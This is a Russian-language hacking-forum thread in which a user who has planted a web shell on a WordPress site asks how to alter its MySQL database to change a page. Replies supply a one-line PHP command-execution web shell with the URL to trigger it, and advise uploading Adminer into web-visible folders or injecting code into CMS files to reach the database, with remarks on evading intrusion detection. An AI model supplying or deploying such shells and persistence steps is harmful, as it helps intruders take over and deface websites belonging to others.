как подконнектится к мускулу?

Discussion in 'Песочница' started by stenm, 25 May 2020.

1. stenm

stenm New Member

Reputations:
    0
    Всем привет, раньше только читал форум, только-что наконец регнулся.

Дано: на wordpress залит простейший шелл, который имеет минималистичный функционал - простейший файловый менеджер, и терминал типа putty. Но на этом конкретном хостинге терминал почему-то не работает. Т.е. даже простейшие команды не отрабатываются.

Вопрос - как внести изменения в мускул базе вордпресса? Желательно несколько вариантов) Нужно изменить инфу на одной странице.

PS и да, я нубский нуб)

2. stenm

stenm New Member

Reputations:
    0
    PS ну и естественно, если есть фтп доступ к вп, то есть и логин/пасс от mysql

3. lifescore

lifescore Elder - Старейшина

Reputations:
    72
    php version на хосте?
    код шелла? mqgic quotes скорее всего

попробуй тупо грузани в файле shell.php код ниже

Code:
    <?php $cmd=$_GET['cmd']; system($cmd);?>
    и обратись http://domian.tld/_path_to_shell_/shell.php?cmd=ls

посмотри ответ в исходном виде (CTRL+U в браузере)
    увидишь результат ls команды - то смотри версию пыхи, и проверь функции которые в твоем шелле, приминимы они к данной версии php?

также зависит от способа колбэка, к примеру weveely по дефолту общается через хедеры, бывали специфичные конфигурации на хосте котороые просто в ответ обрубали хедер и шелл естественно не получал ответ но выполнял команды полученные..

лучше всего создай океружение максимально похожее что на сервере, прогони локально и анализируй логи сервера. вникнешь в суть быстрее и начнешь понимать как внутри кухни смотриться и выполняется

stenm likes this.
  4. lifescore

Reputations:
    72
    stenm likes this.
  5. smirk

smirk Elder - Старейшина

Reputations:
    26
    Если есть доступ к фтп, то залей https://www.adminer.org/en/editor/ в папку которая видна из веба и попробуй подключиться к базе

stenm likes this.
  6. lifescore

Reputations:
    72
    ну так у него не выполняеться его код как я понял вопрос 1 в этом, а залить по фтп adminer.php я думаю он бы и сам догадался

но в целом и общем, как спросил так и ответили ТСу) осталось ему разобраться что в итоге ему нужно. я уже молчу о смысле всех этих действий... если есть фтп с возможностью write хз что за фетиш ТС преследует в рамках обозначенной коненой цели, ну хотябы кругозор расширит кек :)

В итоге 3 путя:
    1) фикс шелл кода (не думаю что подопытный вордпресс сидит за новороченными ids/ips/waf и командой soc 24/7, иначе вышел бы с фтп как и зашел бы сразу после попытки залить свой мего-шелл)
    2) include в cms функции (меняем исходный файлик или заливаем дополнительный подхватывая окружение cms выполняем что нужно)
    3) заливаем adminer в корень или wp-contents (uploads|themes|etc) где пустит к залитому адмайнеру и конектимся к бдхе аля noob

Ну а после, с опытом и прийдет понимание что есть еще не один из путей завладеть бдхой и хостом без вышеперечисленной дрочки в рамках озвученного контекста в вопросе :)

smirk and stenm like this.
  7. ThomasC1121

ThomasC1121 New Member

Reputations:
    0
    Привет, можешь подключится через локалку и внести изменение, скачать программу Denwer и открыть доступ. После заходишь на сайт, импортируешь свою базу данных и вносишь изменение, так же можешь после экспортировать.